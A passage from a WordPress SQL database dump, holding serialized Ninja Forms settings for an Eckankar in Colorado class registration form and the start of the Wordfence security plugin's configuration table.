Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:16;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-8:30 pm - Zoom\";s:5:\"value\";s:79:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:31:\"Select One Class Per Registrant\";s:9:\"field_key\";s:45:\"select_one_class_per_registrant_1658696832524\";}s:2:\"id\";i:681;}i:10;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:36:\"Enter Message for Arahata (Optional)\";s:4:\"type\";s:8:\"textarea\";s:3:\"key\";s:48:\"enter_message_for_arahata_optional_1599679737041\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:36:\"Enter Message for Arahata (Optional)\";s:9:\"field_key\";s:48:\"enter_message_for_arahata_optional_1599679737041\";}s:2:\"id\";i:674;}i:11;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"12\";s:11:\"idAttribute\";s:2:\"id\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:4:\"type\";s:2:\"hr\";s:3:\"key\";s:4:\"hr_2\";s:5:\"label\";s:7:\"Divider\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";}s:2:\"id\";i:672;}i:12;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"13\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:888:\"<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:673;}i:13;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"15\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}s:2:\"id\";i:680;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-09-05 08:39:18\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:815:\"<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 31px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 21px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:261;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-09-05 08:39:18\";s:5:\"label\";s:23:\"User Email Confirmation\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:30:\"New Satsang Class Registration\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:2:\"to\";s:115:\"{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:3549:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3>\n<p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p>\n<p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2022-2023<br></span></p>\n<p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p>\n<p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p>\n<table style=\"border-collapse: collapse; width: 72.8705%; border: 2px solid #d4d2d2;\">\n<tbody>\n<tr>\n<td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p>\n<p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p>\n</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p>\n</div>\n</div>\n</div>\n</div>\";}s:2:\"id\";i:258;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-09-05 08:39:18\";s:5:\"label\";s:24:\"Admin Email Notification\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:260:\"New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:115:\"{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:13:\"email_message\";s:3471:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2022-2023<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 74.2518%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}<strong><br><br>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>\";}s:2:\"id\";i:260;}i:3;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-09-05 08:39:18\";s:5:\"label\";s:16:\"Store Submission\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:259;}}s:8:\"settings\";a:37:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:64:\"Satsang Class Registration- ALL CLASSES TEMPLATE --DO NOT DELETE\";s:10:\"created_at\";s:19:\"2023-09-05 08:39:18\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:11:\"<p><br></p>\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:14:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:4:\"hr_1\";i:8;s:56:\"eck_member_classes_available_for_2023-2024_1693928749137\";i:9;s:45:\"select_one_class_per_registrant_1658696832524\";i:10;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:11;s:4:\"hr_2\";i:12;s:4:\"html\";i:13;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:1:\" \";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:12:\"unique_field\";s:1:\"0\";s:24:\"form_title_heading_level\";s:1:\"3\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00);
/*!40000 ALTER TABLE `wpcl_nf3_upgrades` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_upgrades` with 47 row(s)
--

--
-- Table structure for table `wpcl_wfconfig`
--

DROP TABLE IF EXISTS `wpcl_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfconfig`
--

LOCK TABLES `wpcl_wfconfig` WRITE;
/*!40000 ALTER TABLE `wpcl_wfconfig` DISABLE KEYS */;
INSERT INTO `wpcl_wfconfig` VALUES ('alertOn_update',0x30,'yes'),('alertOn_scanIssues',0x31,'yes'),('alertOn_throttle',0x30,'yes'),('alertOn_block',0x31,'yes'),('alertOn_loginLockout',0x31,'yes'),('alertOn_breachLogin',0x31,'yes'),('alertOn_lostPasswdForm',0x31,'yes'),('alertOn_adminLogin',0x31,'yes'),('alertOn_firstAdminLoginOnly',0x30,'yes'),('alertOn_nonAdminLogin',0x30,'yes'),('alertOn_firstNonAdminLoginOnly',0x30,'yes'),('alertOn_wordfenceDeactivated',0x31,'yes'),('alertOn_wafDeactivated',0x31,'yes'),('liveTrafficEnabled',0x30,'yes'),('advancedCommentScanning',0x31,'yes'),('checkSpamIP',0x31,'yes'),('spamvertizeCheck',0x31,'yes'),('liveTraf_ignorePublishers',0x31,'yes'),('liveTraf_displayExpandedRecords',0x30,'no'),('scheduledScansEnabled',0x31,'yes'),('lowResourceScansEnabled',0x30,'yes'),('scansEnabled_checkGSB',0x31,'yes'),('scansEnabled_checkHowGetIPs',0x31,'yes'),('scansEnabled_core',0x31,'yes'),('scansEnabled_themes',0x30,'yes'),('scansEnabled_plugins',0x30,'yes'),('scansEnabled_coreUnknown',0x31,'yes'),('scansEnabled_malware',0x31,'yes'),('scansEnabled_fileContents',0x31,'yes'),('scansEnabled_fileContentsGSB',0x31,'yes'),('scansEnabled_checkReadableConfig',0x31,'yes'),('scansEnabled_suspectedFiles',0x31,'yes'),('scansEnabled_posts',0x31,'yes'),('scansEnabled_comments',0x31,'yes'),('scansEnabled_suspiciousOptions',0x31,'yes'),('scansEnabled_passwds',0x31,'yes'),('scansEnabled_diskSpace',0x31,'yes'),('scansEnabled_wafStatus',0x31,'yes'),('scansEnabled_options',0x31,'yes'),('scansEnabled_wpscan_fullPathDisclosure',0x31,'yes'),('scansEnabled_wpscan_directoryListingEnabled',0x31,'yes'),('scansEnabled_dns',0x31,'yes'),('scansEnabled_scanImages',0x30,'yes'),('scansEnabled_highSense',0x30,'yes'),('scansEnabled_oldVersions',0x31,'yes'),('scansEnabled_suspiciousAdminUsers',0x31,'yes'),('liveActivityPauseEnabled',0x31,'yes'),('firewallEnabled',0x31,'yes'),('blockFakeBots',0x30,'yes'),('autoBlockScanners',0x31,'yes'),('loginSecurityEnabled',0x31,'yes'),('loginSec_strongPasswds_enabled',0x31,'yes'),('loginSec_breachPasswds_enabled',0x31,'yes'),('loginSec_lockInvalidUsers',0x30,'yes'),('loginSec_maskLoginErrors',0x31,'yes'),('loginSec_blockAdminReg',0x31,'yes'),('loginSec_disableAuthorScan',0x31,'yes'),('loginSec_disableOEmbedAuthor',0x30,'yes'),('loginSec_requireAdminTwoFactor',0x30,'yes'),('notification_updatesNeeded',0x31,'yes'),('notification_securityAlerts',0x31,'yes'),('notification_promotions',0x31,'yes'),('notification_blogHighlights',0x31,'yes'),('notification_productUpdates',0x31,'yes'),('notification_scanStatus',0x31,'yes'),('other_hideWPVersion',0x30,'yes'),('other_blockBadPOST',0x30,'yes'),('other_scanComments',0x31,'yes'),('other_pwStrengthOnUpdate',0x31,'yes'),('other_WFNet',0x31,'yes'),('other_scanOutside',0x30,'yes'),('other_bypassLitespeedNoabort',0x30,'yes'),('deleteTablesOnDeact',0x30,'yes'),('autoUpdate',0x31,'yes'),('startScansRemotely',0x30,'yes'),('disableConfigCaching',0x30,'yes'),('addCacheComment',0x30,'yes'),('disableCodeExecutionUploads',0x30,'yes'),('allowHTTPSCaching',0x30,'yes'),('debugOn',0x30,'yes'),('email_summary_enabled',0x31,'yes'),('email_summary_dashboard_widget_enabled',0x31,'yes'),('ssl_verify',0x31,'yes'),('ajaxWatcherDisabled_front',0x30,'yes'),('ajaxWatcherDisabled_admin',0x30,'yes'),('wafAlertOnAttacks',0x31,'yes'),('disableWAFIPBlocking',0x30,'yes'),('showAdminBarMenu',0x31,'yes'),('displayTopLevelOptions',0x31,'yes'),('displayTopLevelBlocking',0x30,'yes'),('displayTopLevelLiveTraffic',0x30,'yes'),('displayAutomaticBlocks',0x31,'yes'),('allowLegacy2FA',0x30,'yes'),('scan_include_extra','','yes'),('alertEmails',0x7765626D61737465724065636B616E6B61722D636F6C6F7261646F2E6F7267,'yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignoreUA','','yes'),('maxMem',0x323536,'yes'),('scan_exclude',0x77702D636F6E74656E742F706C7567696E732F6D6F6465726E2D6576656E74732D63616C656E6461722F6170702F6170692F5374726970652F536572766963652F5465726D696E616C2F526561646572536572766963652E7068700A77702D636F6E74656E742F706C7567696E732F626F6C64677269642D6261636B75702D7072656D69756D2F76656E646F722F7068707365636C69622F7068707365636C69622F7068707365636C69622F4D6174682F436F6D6D6F6E2F46696E6974654669656C642E706870,'yes'),('scan_maxIssues',0x31303030,'yes'),('scan_maxDuration','','yes'),('whitelisted','','yes'),('whitelistedServices',0x7B7D,'yes'),('bannedURLs','','yes'),('maxExecutionTime',0x30,'yes'),('howGetIPs','','yes'),('actUpdateInterval',0x32,'yes'),('alert_maxHourly',0x30,'yes'),('loginSec_userBlacklist','','yes'),('liveTraf_ma